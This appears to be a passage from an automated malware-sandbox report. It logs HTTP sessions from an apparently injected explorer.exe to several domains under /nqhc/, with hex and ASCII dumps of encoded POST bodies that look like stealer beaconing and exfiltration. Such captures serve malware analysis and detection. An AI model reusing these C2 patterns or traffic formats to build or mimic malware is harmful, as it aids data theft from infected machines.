lZF2iAeLoUQ6Hww0ViI1buMT9NDCP_MouFBrts801JRT7nzjY5sPoAJArqBZ(o6nbjKqdto31XSVi7LpQFNW(uzk3UlSHUrDIakW4v84kSSqvzXXBDDdvwDVCAIwB9A5A-C4Oye6sAiHdJVb4TZVVLHP5cYHAOX-HHrb9gj72gHUQbQViOuQKF1dg3T_65x5jDtmvQSYBUz5h71V3kV68ZCfk1cwjfGtizaicl93Mw0aK6Rm1CmKz9cLXaQqRayxY7GJQDYt9cGHlbjS3HB5JZuWNyRQgWuzwTLzxrLjrkjqvygNjuUnDSbUHV9yNbn64O54fBHHEkJAfx8pXdIdkGXLPnrZNHO_fZw3zRnYEBNA~yOJVTtVFd(mfFH3oHgZA1rRZnbw4tKvqi0ntrukBtg7xauViwo2KhzS8R5EbrOYKlIymKdcbcvp8COnthCgo3T72p3ynLRoieD3AOueRqDok7tiMj9ujvzGltXRbGGcOgx5Ghr5(MaMTL6JKoiTvhAHBwRm2dhvY95fLa2n3inPW69foYRQP-QIt_LMCi2Dlr2GQmbwPm~NFm9NOt9QwcgbXnSdOK18CIeo
                                                                                                                                                                                    Nov 21, 2022 19:20:46.192485094 CET654OUTData Raw: 72 58 73 64 32 32 64 28 6f 35 48 57 71 42 6c 36 63 79 50 4c 47 6e 31 45 55 63 7a 39 5f 4e 57 57 70 4d 76 74 5f 30 68 63 47 6f 45 4e 62 71 71 74 59 5a 5f 61 5a 28 52 53 6b 79 7a 62 6b 42 6d 6d 33 6d 67 57 65 31 7a 63 6c 36 51 50 59 61 30 42 6b 65
                                                                                                                                                                                    Data Ascii: rXsd22d(o5HWqBl6cyPLGn1EUcz9_NWWpMvt_0hcGoENbqqtYZ_aZ(RSkyzbkBmm3mgWe1zcl6QPYa0BkeV8VMqP5jgYApgpl4DRKGlhnM9jIJTRudcUpj_F-TjzZIIAkI35Ljgo9qESsNHfh6041fKFpo0zjOBUxCjiYd_6-ri3MFDiUkEiCpYouEJMFb6fNtfye8PqKFtrWkSMa4U5Zxhta0FLuFjwgOE7APsL-lAy153xAMk
                                                                                                                                                                                    Nov 21, 2022 19:20:46.306955099 CET656OUTData Raw: 36 4f 59 4b 57 32 6c 59 2d 76 50 42 2d 38 76 79 71 46 75 28 6c 50 38 28 5a 74 70 45 6e 7a 74 4a 53 35 46 6c 56 7a 73 78 49 71 4f 65 49 32 36 69 34 46 67 38 50 77 7a 77 6c 6f 6f 48 4b 38 46 74 48 30 71 4f 59 76 7a 72 44 77 74 31 6c 77 31 46 67 59
                                                                                                                                                                                    Data Ascii: 6OYKW2lY-vPB-8vyqFu(lP8(ZtpEnztJS5FlVzsxIqOeI26i4Fg8PwzwlooHK8FtH0qOYvzrDwt1lw1FgYh~RkFKyWjWVtbar53SLTWgsl5fUmWOS~pVSJC5yXj~z9m(5sHZXhB8M8vnV6JlTvGx343Oll3hidVSUikl9jyrENFo3ZFbJ6vj0Munk23rw6YPzMG40(QuKR7AgJUJYkMEFExMpvpujrI4-gtypeax-Tcx047Sc~Z
                                                                                                                                                                                    Nov 21, 2022 19:20:46.307128906 CET659OUTData Raw: 43 61 59 51 68 70 4f 28 54 32 74 56 51 56 61 6e 4b 33 48 6f 78 68 59 66 62 34 74 5a 78 69 4f 61 56 43 6f 68 6b 51 79 56 2d 51 5f 46 61 37 79 57 6f 55 4d 54 6c 51 4c 4d 61 65 6e 54 35 72 57 32 42 48 64 7e 69 67 34 33 47 67 49 4d 37 52 42 34 46 62
                                                                                                                                                                                    Data Ascii: CaYQhpO(T2tVQVanK3HoxhYfb4tZxiOaVCohkQyV-Q_Fa7yWoUMTlQLMaenT5rW2BHd~ig43GgIM7RB4FbeWbo7ZXim~_a8O6JdFevwt-0YLB5gHBbM51mvAJ4KFV9mqVbbjcTUdv6bXJi2pRzt8yDz9boeKQ2DgLccGFjnGt~AxcwuMju6VEjnh8Cu9QrSW_~cVnLGz-pjvrgluitrNcNi3iTExT9GMwIOfiNLzufmpHQrrRRt
                                                                                                                                                                                    Nov 21, 2022 19:20:46.307300091 CET664OUTData Raw: 43 65 57 31 42 74 53 51 6e 31 6a 64 54 56 47 4f 46 4b 5f 59 57 28 30 6c 66 35 71 51 79 78 37 44 45 74 4a 57 6c 56 68 43 50 53 75 71 41 59 54 71 48 42 6c 45 6e 46 43 75 59 46 52 62 5f 4b 64 69 71 4a 55 55 33 6a 47 6b 78 74 5a 7e 57 45 4e 47 4a 36
                                                                                                                                                                                    Data Ascii: CeW1BtSQn1jdTVGOFK_YW(0lf5qQyx7DEtJWlVhCPSuqAYTqHBlEnFCuYFRb_KdiqJUU3jGkxtZ~WENGJ68tlEthmi1QQIyQcZqwlwjtL5v5JOgG29t6dEwgGWhSQAyQrmORNoO4E5NI6ah0DvCdoNIT4cXbHI6UCVDQN327km8kdwJT4Z66jxVGY9KnpBKPaJdy-CDc3bG8Us8sxd2TGPyCpfzX1fsJgUE2NLQnAcfmemRQobI
                                                                                                                                                                                    Nov 21, 2022 19:20:46.307435036 CET672OUTData Raw: 35 5a 63 52 35 32 71 6a 33 76 69 4f 49 79 76 58 6f 56 6b 50 4a 28 4b 66 65 54 47 67 55 68 6e 75 57 52 6c 7e 39 73 6a 6a 6a 69 66 50 70 4f 4a 46 74 28 4c 61 4f 38 4e 49 54 65 4c 48 62 72 4a 58 61 72 33 58 57 33 37 79 55 43 48 78 42 55 35 48 50 6f
                                                                                                                                                                                    Data Ascii: 5ZcR52qj3viOIyvXoVkPJ(KfeTGgUhnuWRl~9sjjjifPpOJFt(LaO8NITeLHbrJXar3XW37yUCHxBU5HPosNb0dG39x5QFDuz4kJ4Jla0AFR4(MlT85yrGiLRZIXvvagm6PgS6FjXe43ReSEfFuGhOoPnHZLw(8lODtP4tlOeuLkJoU~nfHy3VrPpYDOcgjfx28~gE7Jel_PdD3brmqxeHmEE9SxpshIpUAHiDkgj9i438Wuymd
                                                                                                                                                                                    Nov 21, 2022 19:20:46.307646036 CET677OUTData Raw: 47 6c 33 56 57 35 45 6f 59 28 53 69 75 74 53 49 34 4a 57 32 61 61 54 36 49 7a 78 74 43 78 2d 4e 6f 7a 2d 49 6f 55 6f 38 33 62 71 32 49 68 50 46 33 7e 6b 52 77 56 6b 58 66 64 65 44 77 79 5f 53 68 37 67 6f 74 63 4d 55 6d 4f 78 61 35 46 39 74 5a 67
                                                                                                                                                                                    Data Ascii: Gl3VW5EoY(SiutSI4JW2aaT6IzxtCx-Noz-IoUo83bq2IhPF3~kRwVkXfdeDwy_Sh7gotcMUmOxa5F9tZgTsFU5L-vu2osnXUN2xQylA7a4dY9qn5pfg-u8L9GSEQbjO9OlH_qDwVcRQa4IW-gqIwWtQNPNLAVMYjQUQ1z3UzxRWQO7KAKQkJurIo6E~4m7D0w4evYQ2hDHBiUgTKl1vjCJ5bFt3K01wSxBWw4-9ey8pGqjlOtc
                                                                                                                                                                                    Nov 21, 2022 19:20:46.307719946 CET679OUTData Raw: 58 56 62 53 78 79 61 6a 6e 6b 77 51 63 46 2d 30 52 5a 67 46 39 54 35 34 77 79 6b 66 6f 4c 32 66 43 73 56 31 58 70 6f 67 36 42 72 45 42 6e 4f 68 59 5a 55 39 71 67 79 38 68 54 48 42 4d 59 39 55 47 45 7a 53 38 54 49 41 55 31 63 76 41 70 6f 34 6b 38
                                                                                                                                                                                    Data Ascii: XVbSxyajnkwQcF-0RZgF9T54wykfoL2fCsV1Xpog6BrEBnOhYZU9qgy8hTHBMY9UGEzS8TIAU1cvApo4k8WNZosuUqiH2BWVTaWZZgQniB2HOfKdeJygW6u6yJyKBQ4yNH9pmQvbMwL9TOAMihqzWa91-9_ROSqzkAIgcy32FQ7RkVqL65svkOJtfkyoT1QZagXZtlUvv4A(v6l7nebTgFH9-2cSibvXi5n7uPS8pY0Z5nxcYBl
                                                                                                                                                                                    Nov 21, 2022 19:20:46.421680927 CET682OUTData Raw: 64 57 6b 4f 34 6a 44 35 49 77 42 33 6c 32 54 71 49 51 46 66 43 56 64 6a 43 66 46 61 31 4e 49 7e 78 59 36 4e 56 42 65 32 38 4c 54 4e 70 44 4b 7a 53 4f 74 52 6b 4c 76 51 44 54 77 62 79 38 52 33 4c 64 6b 6b 62 65 69 50 78 28 68 48 50 76 75 54 59 63
                                                                                                                                                                                    Data Ascii: dWkO4jD5IwB3l2TqIQFfCVdjCfFa1NI~xY6NVBe28LTNpDKzSOtRkLvQDTwby8R3LdkkbeiPx(hHPvuTYcqmtcMW58ppTX3mdAavYFi2_~oSqDZ4dM2LuVyorx96pi6jM5HAcJJzmhxTnHO(TPU(bWQMBDxjBG1oy5VLhf3OEOqY_OeWXzyM7QmOdyc30occgxZ01YAvPXkCYFe1hZ29q7KFjcQupsSObyll6fZlJ0C~gMlP23_
                                                                                                                                                                                    Nov 21, 2022 19:20:46.421780109 CET687OUTData Raw: 62 33 58 44 78 33 4c 35 59 38 45 79 46 36 34 61 6f 73 6d 66 75 62 5f 6c 6d 70 46 58 2d 56 36 66 36 35 46 4e 75 79 4d 6b 6c 70 55 4d 39 44 44 38 4e 34 61 76 69 6f 7a 53 52 59 35 46 32 52 78 73 70 30 55 62 44 35 62 61 69 45 42 64 65 41 41 42 72 74
                                                                                                                                                                                    Data Ascii: b3XDx3L5Y8EyF64aosmfub_lmpFX-V6f65FNuyMklpUM9DD8N4aviozSRY5F2Rxsp0UbD5baiEBdeAABrt6UldsQCtcPqr6UB0ZLY1TuOw41E8hY8BrMysvjLG3c-Iqe-peJezWdVCULwUrW2rA7ucx0ZSopkRJtrl9cJzeYjdinn3mywyU(g6sZGKfAT4Z7WXuJzG-ROaylGNs04B8OV7YgUf7(e~Bnpn2n-jgm9pTNmEZhIJQ
                                                                                                                                                                                    Nov 21, 2022 19:20:46.421889067 CET690OUTData Raw: 63 79 70 54 54 65 6f 6c 50 71 55 54 54 53 38 63 55 75 4b 4e 73 41 62 35 6c 70 73 34 61 48 4d 31 4b 4a 5f 50 53 65 6b 59 79 49 52 46 34 68 78 76 79 53 39 39 6e 6a 68 42 4f 4f 6c 4f 61 39 4e 6c 6c 69 65 4e 75 55 58 55 39 54 77 4b 6a 7e 5a 65 4c 37
                                                                                                                                                                                    Data Ascii: cypTTeolPqUTTS8cUuKNsAb5lps4aHM1KJ_PSekYyIRF4hxvyS99njhBOOlOa9NllieNuUXU9TwKj~ZeL72Mv23Z182sL7G~qb-UzHVFBQBEIUWiVWRpZpzpevlYTn-4voWGeT_5yJol2m2c2P78lx6O960eg3uVFw1ugw7xYRoyrmOcOdJ2txH5p1Bi87MH2bWWRVjC0yfhKsArljErDtF6ptbQreg(C6XuF6vbt~UOUhD3qbO
                                                                                                                                                                                    Nov 21, 2022 19:20:46.652069092 CET695INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:20:46 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                    Link: <https://royaltechglobal.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                                    Connection: Upgrade
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                    X-Endurance-Cache-Level: 2
                                                                                                                                                                                    X-nginx-cache: WordPress
                                                                                                                                                                                    Content-Length: 13045
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6b 73 db c6 b2 ed 67 a9 ea fe 87 31 5c 89 a4 2d 02 20 f8 d0 83 22 99 63 2b ce e3 1c 3b ce b1 9c 9d bb 4f 9c 52 0d 80 26 30 d6 60 06 99 19 90 62 74 f4 df 6f 0f 00 be 24 8a a2 5f 3b 55 77 6f da 22 67 7a ba 57 af 5e bd fa 4f be 7d 7d fe f6 1f 3f bf 20 a9 c9 f8 70 77 b7 6f 7f 49 cc d4 c0 e1 46 39 84 53 91 0c 1c 10 ee 2f 17 ce ee 4e ae 60 c4 ae 07 8e 4c 7a 58 60 72 dd f3 7d 99 e4 5e 06 be d0 4f 1d 82 00 3b fd 14 68 3c dc dd 21 64 a7 9f 81 a1 24 4a a9 d2 60 06 ce 2f 6f bf 73 4f 9c e5 27 41 33 18 38 63 06 93 5c 2a e3 90 48 0a 03 02 53 27 2c 36 e9 20 86 31 8b c0 2d 2f 75 dd ee ce 4e ff 89 eb 92 67 9c 13 26 c8 6b 01 e4 e2 c5 6b d2 f1 5a de b1 17 10 97 50 26 35 48 2f 92 19 71 dd a1 4d 5f ea a4 64 28 8d 5e ea 23 24 13 31 5c 3b c4 bf 9b 9a 80 00 45 8d 54 4b d9 77 9a ee 3f fb f1 35 fe 1e cc bb cf 60 74 a4 58 6e 88 99 e6 08 44 f3 9c b3 88 1a 26 85 cf e3 c3 f7 5a 0a 84 e4 54 6b 7c 2b c9 ba 3a 4a 21 a3 76 c2 9d 9d 1b e7 3f ca 7e d7 c6 e9 39 95 c6 ef fc 77 7e 95 e2 49 95 38 0d e7 3f 12 45 f3 d4 e9 fd 86 c9 b6 09 66 3e 57 a8 7a a4 8a 2c 7c c9 b4 b1 39 2c 5e 01 50 72 4a b9 81 28 4d b8 0c 29 b7 02 bd f3 c5 1f 69 f4 ce 7f 1a ce 8b 79 55 cc 0c 64 16 e7 05 87 0c 27 5f e9 64 e3 3f e2 fb b6 3d 9e f2 45 41 2e 35 b3 42 38 bd a0 6a e2 f4 16 c0 bf 42 f8 33 4d 60 5b 5c cc b3 9b c2 c4 1f 64 66 ab 0a c5 b7 a8 ba c5 32 14 b7 24 b4 ad 3e f3 09 6e 1b 1f af c3 5d ac 65 35 5a 9f ac 46 85 be d0 e4 27 69 c8 77 b2 10 f1 b6 c2 d4 00 28 4f ae 60 cc 64 a1 b7 93 68 49 9c df 97 e5 79 ad 12 2a d8 9f a5 ef b7 b6 8a 5c 2d aa 67 79 63 73 c9 5b 4c 26 df 97 d9 5b 2f bb e1 70 99 c8 65 59 7f cc 50 d4 d7 e1 7b 88 cc b6 28 93 dc 8d a4 30 20 cc 3b bf c8 b9 a4 b1 7e e7 b7 9a ad d6 3b 3f 08 de f9 91 92 79 0e b1 fb 12 3b bd a2 57 ca 0d bc 5c 24 1f 35 b2 85 c0 c2 09 8b 4d 8a a6 e8 34 1b 4e 0a 2c 49 8d d3 eb b4 71 33 cc 92 2f a7 f9 38 e8 db e5 05 7d 94 c1 9e 4e 20 cc ab aa 0f 71 15 52 17 2f a9 48 8a 92 bf 03 c2 fd e5 c2 06 f5 cf 54 99 d7 a3 ed 47 c2 f6 9a 19 b0 36 0d 15 d0 38 52 45 16 6e 5d 5e cf b0 a8 b4 de bd a7 ca 85 6d b0 ed fa 66 84 b6 77 e4 06 53 af 15 29 2f 2c cd 14 d4 c7 2d 1e c7 fb fd 76 77 67 a7 ef eb 48 b1 dc 0c ed f9 89 eb 92 67 9c 13 26 c8 6b 01 e4 e2 c5 6b e2 ba c3 dd dd dd ea e9 6d ca 34 b1 63 11 fc 95 b9 61 19 fb 13 62 32 61 26 25 26 05 f2 0f 49 b5 29 ab 72 5e 24 08 32 0e 4e bd a0 49 5c 52 31 f3 fd a9 cd b0 6c fc 89 54 71 ae 40 6b bf ca d5 be 06 e9 97 ed 76 fa 86 19 0e 43 6b 43 22 a4 21 23 59 88 18 51 ee 69 d3 f7 ab 4c 2c c9 c0 50 92 2b 99 83 32 d3 81 23 93 1e 97 11 e5 e0 90 48 0a 03
                                                                                                                                                                                    Data Ascii: rksg1\- "c+;OR&0`bto$_;Uwo"gzW^O}}? pwoIF9S/N`LzX`r}^O;h<!d$J`/osO'A38c\*HS',6 1-/uNg&kkZP&5H/qM_d(^#$1\;ETKw?5`tXnD&ZTk|+:J!v?~9w~I8?Ef>Wz,|9,^PrJ(M)iyUd'_d?=EA.5B8jB3M`[\df2$>n]e5ZF'iw(O`dhIy*\-gycs[L&[/peYP{(0 ;~;?y;W\$5M4N,Iq3/8}N qR/HTG68REn]^mfwS)/,-vwgHg&kkm4cab2a&%&I)r^$2NI\R1lTq@kvCkC"!#YQiL,P+2#H
                                                                                                                                                                                    Nov 21, 2022 19:20:46.652133942 CET697INData Raw: c2 0c 50 b9 4b 54 8e f8 eb d3 4b a4 a5 ec c7 bb 3f 08 65 25 ba 2c f7 b9 80 7b a8 ba 52 9f 58 9b 0d 1c 9a e7 9c 45 e5 7e 7c 1e 1f be d7 b8 27 12 71 aa f5 c0 29 a5 73 75 94 42 46 dd 44 d1 3c 75 86 b8 f8 b2 c1 b5 99 6f df f7 ab 14 0f 97 6d dd 5a 65
                                                                                                                                                                                    Data Ascii: PKTK?e%,{RXE~|'q)suBFD<uomZe~{:<MC5^dUQ,@f~h8LNx!,0ho!95oFTvb"t(@M]&.CS~s{a%IF.zy%W+6lcmre~=DV
                                                                                                                                                                                    Nov 21, 2022 19:20:46.652164936 CET698INData Raw: ef 07 bd 7d cc 30 86 46 69 99 b4 ef 48 51 3f 1f d8 de ab 2f 25 3b 6d a8 81 28 a5 22 01 a7 b1 44 de 89 64 96 73 30 e0 0c 06 03 5a 4d 72 61 73 ed 62 ee ce 75 70 d0 d8 07 2b bf 2c 54 04 ff fb bf 37 b7 07 5e 24 45 84 e9 d6 ba df 44 48 6b e9 7e d0 03
                                                                                                                                                                                    Data Ascii: }0FiHQ?/%;m("Dds0ZMrasbup+,T7^$EDHk~oLo{n'LreTd8A{uKg}_Gffi#.vu8L!7;19a30g;T1SH&]J&iz9"]
                                                                                                                                                                                    Nov 21, 2022 19:20:46.652196884 CET699INData Raw: 2c 70 7b 0c 52 1e 97 90 b6 2c ab 78 e3 20 e8 bb 69 af f6 40 59 f6 c8 2a 32 66 dc b0 40 96 62 59 cc 96 55 73 86 f6 28 8c 82 3f 0a a6 20 76 ad d3 d6 92 98 db e9 2c a7 71 cc 44 b2 f0 78 29 72 d3 6b 6f 5e 97 14 17 96 ab d6 0c 89 a6 c0 92 d4 94 10 1f
                                                                                                                                                                                    Data Ascii: ,p{R,x i@Y*2f@bYUs(? v,qDx)rko^iSD3(2,5=*E4gr&*P.a#Qc)Dq@b})99CD@{jTujCb6S=-9gHrzH`Auvu*B6BDB=t6vtM/8()
                                                                                                                                                                                    Nov 21, 2022 19:20:46.652225971 CET701INData Raw: d7 3e d9 90 72 82 29 5d af 79 64 53 6e 7b 93 14 14 ec 7b 4c a3 10 53 59 18 77 c4 e1 fa e0 26 a1 b9 1d a8 6b 73 42 19 4f c9 4a 86 9c 90 21 f1 28 67 89 e0 30 32 37 18 a1 68 61 7b 3e cb 50 4f 26 5c 26 38 c3 b5 6b 43 15 be 34 ef 84 41 c4 38 ca a3 e0
                                                                                                                                                                                    Data Ascii: >r)]ydSn{{LSYw&ksBOJ!(g027ha{>PO&\&8kC4A8%Hk4@P7ue#0<aY.bl~~$6"IWj]/.Xmf!];aI{dLNrrpr28ppl`+Z6p}3GN{~\f =R
                                                                                                                                                                                    Nov 21, 2022 19:20:46.652257919 CET702INData Raw: ca ca 1f 3e a2 87 17 9c 86 87 af 45 75 e7 85 a2 75 31 5e 85 91 c2 fe aa 28 65 a8 91 d1 87 df d2 02 9d 0d 6a 16 1d 4b cc 0e ca 56 81 6d d5 3a 6f 95 97 56 75 69 97 97 76 75 59 62 d4 3a ef 96 97 6e 75 39 2a 2f 47 d5 e5 b8 bc 1c 57 97 93 f2 72 52 5d
                                                                                                                                                                                    Data Ascii: >Euu1^(ejKVm:oVuivuYb:nu9*/GWrR]Ni=b\sKT[AP~NjD~i`Z3m0Xi?;T{F24~_PY<H@i{BSR.e/"rS^s)b0+Ja{?13_9HS->B%ic
                                                                                                                                                                                    Nov 21, 2022 19:20:46.652288914 CET703INData Raw: 5a ef 91 0c 62 46 07 7b 94 f3 3d e2 0f 77 fb 9c 89 2b 82 3b 19 ec 69 74 3a e8 14 c0 ec 11 16 0f f6 c6 13 37 a6 ea ca 0d b9 8c ae dc f2 d5 2d 21 52 05 a3 c1 5e 6a 4c de f3 7d 25 a7 94 1b 88 d2 84 cb 90 72 2f 92 99 3f c9 dd 48 0a 03 c2 f8 26 85 0c
                                                                                                                                                                                    Data Ascii: ZbF{=w+;it:7-!R^jL}%r/?H&_cTk02KX/@7=R%`"W;,w|CRm3/Y(J,z8Bp7&&?DG@*bwrTs9pvK)rk Jmd2x4
                                                                                                                                                                                    Nov 21, 2022 19:20:46.652329922 CET705INData Raw: e3 a3 ee e7 f7 b7 77 8c b8 9d e3 66 b7 ec d3 c6 8e ad 15 0e 4b 38 cf 36 e0 04 75 47 7f 8d 3a 73 c9 d0 34 40 98 68 0d 9c 0b 59 a8 08 be 57 34 4f 59 e4 10 99 83 a2 46 aa 81 c3 44 0d 53 8a 87 87 ca 32 d6 d6 c3 3e 7e 91 eb 8c 0b ec 97 1a 93 f7 7c 7f
                                                                                                                                                                                    Data Ascii: wfK86uG:s4@hYW4OYFDS2>~|2x'UM3<VC&,6iiX8QgD^Lqfs#rpPK^8#FGSgDA"jj23!*UbFlNmmi+;`
                                                                                                                                                                                    Nov 21, 2022 19:20:46.652362108 CET706INData Raw: f7 7c 5f c9 29 e5 06 a2 34 e1 32 a4 dc 8b 64 e6 0c 7f 90 19 f4 7d 8a 3b e0 6c b8 bb 86 d6 d1 e3 b4 72 a9 cd a5 3d dd 67 96 d3 64 39 8a 68 5b f1 f2 69 28 0b e3 16 da 77 86 cf ec 91 fc a2 37 b2 3c fe ac 2c 8f b7 64 19 49 61 68 54 f3 3c af 2e 8f 31
                                                                                                                                                                                    Data Ascii: |_)42d};lr=gd9h[i(w7<,dIahT<.1=LOd1h</H^|#2WlL)VpMJ"?WsX/8c63OTG7,oGA22:!AH!O.c.mtbD5Q4}636r\E"c6{h
                                                                                                                                                                                    Nov 21, 2022 19:20:46.652419090 CET707INData Raw: 3b b6 60 ff 59 f0 e9 a7 43 1d 55 50 02 3e 1d aa 6b a1 5e d1 cf 40 aa 53 8a 95 2b c6 3f 1d ab 5d b1 42 87 df c5 42 d7 f6 7d 5d fa 19 2f 7d 1d 29 96 1b 62 a6 39 1a dd c0 b5 f1 df d3 31 ad a2 ce 70 d7 ff 1b e9 3f f9 ed fc db 67 6f 9f fd 46 fe e6 ef
                                                                                                                                                                                    Data Ascii: ;`YCUP>k^@S+?]BB}]/})b91p?goFYr3J2 0/8>q,6CvwfxDyJEyATs@'#^`lMC;Jl`B~}hCK1K0
                                                                                                                                                                                    Nov 21, 2022 19:20:46.766238928 CET708INData Raw: 2e 9f e5 67 a1 db 74 86 b8 83 52 f0 99 de 93 c9 c4 1b 4f d0 14 19 e8 52 ec ea e8 8f 14 80 1b 53 75 e5 4e a4 8a 73 05 5a bb e5 93 4f 0c 55 09 98 c1 de 65 c8 a9 b8 da 1b 7e 8b 59 e4 57 cc fa d9 66 91 b7 36 ab 54 ff f9 94 fc fd d7 f2 8a db c8 ef 73
                                                                                                                                                                                    Data Ascii: .gtRORSuNsZOUe~YWf6Tstq(6&#r)*%'.-s|\@hk;c| {X,;._~eGdrC4%cZE"LT.v1Q7>SE\P2 7f~Q


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    14192.168.11.2049837192.185.32.15780C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:20:48.332937956 CET709OUTGET /nqhc/?r4txB=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPmagqEcu1BGBCcvtDrHnt/goojoamQzAeoLFDeA==&1b=S8jD HTTP/1.1
                                                                                                                                                                                    Host: www.royaltechglobal.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 21, 2022 19:20:48.560080051 CET709INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:20:48 GMT
                                                                                                                                                                                    Server: nginx/1.21.6
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                    X-Redirect-By: WordPress
                                                                                                                                                                                    Location: http://royaltechglobal.com/nqhc/?r4txB=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPmagqEcu1BGBCcvtDrHnt/goojoamQzAeoLFDeA==&1b=S8jD
                                                                                                                                                                                    X-Endurance-Cache-Level: 2
                                                                                                                                                                                    X-nginx-cache: WordPress
                                                                                                                                                                                    X-Server-Cache: true
                                                                                                                                                                                    X-Proxy-Cache: MISS


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    15192.168.11.204983838.55.15.21480C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:21:04.083949089 CET710OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.xiaoxiuzhen.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 187
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.xiaoxiuzhen.com
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.xiaoxiuzhen.com/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 41 6b 61 4d 58 5f 51 6b 64 4c 66 56 66 61 4d 5f 6d 5a 4f 34 66 74 76 48 31 61 4f 4e 47 2d 55 4e 30 75 54 36 48 42 64 55 46 73 56 41 5a 72 46 4b 71 72 49 34 49 46 38 58 6b 56 71 49 44 53 6f 37 48 59 66 6d 76 6c 53 46 63 62 37 6c 66 7a 36 4c 4c 6a 4c 4e 7e 50 69 45 77 6f 67 37 30 34 5a 51 47 53 75 6c 4a 4f 5a 5f 47 33 41 6e 39 7a 78 65 63 33 34 76 69 56 75 78 43 30 5a 65 35 71 37 57 52 72 44 33 31 4d 6b 59 73 56 30 46 6e 77 75 55 63 75 54 48 35 37 42 54 73 5a 4a 36 6a 6e 6e 59 6a 61 34 5a 65 32 42 37 6b 64 47 49 7e 49 71 63 59 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=AkaMX_QkdLfVfaM_mZO4ftvH1aONG-UN0uT6HBdUFsVAZrFKqrI4IF8XkVqIDSo7HYfmvlSFcb7lfz6LLjLN~PiEwog704ZQGSulJOZ_G3An9zxec34viVuxC0Ze5q7WRrD31MkYsV0FnwuUcuTH57BTsZJ6jnnYja4Ze2B7kdGI~IqcYQ).
                                                                                                                                                                                    Nov 21, 2022 19:21:04.285512924 CET711INHTTP/1.1 400 Bad Request
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:21:04 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: d404 Not Found0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    16192.168.11.204983938.55.15.21480C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:21:06.270848036 CET712OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.xiaoxiuzhen.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 527
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.xiaoxiuzhen.com
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.xiaoxiuzhen.com/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
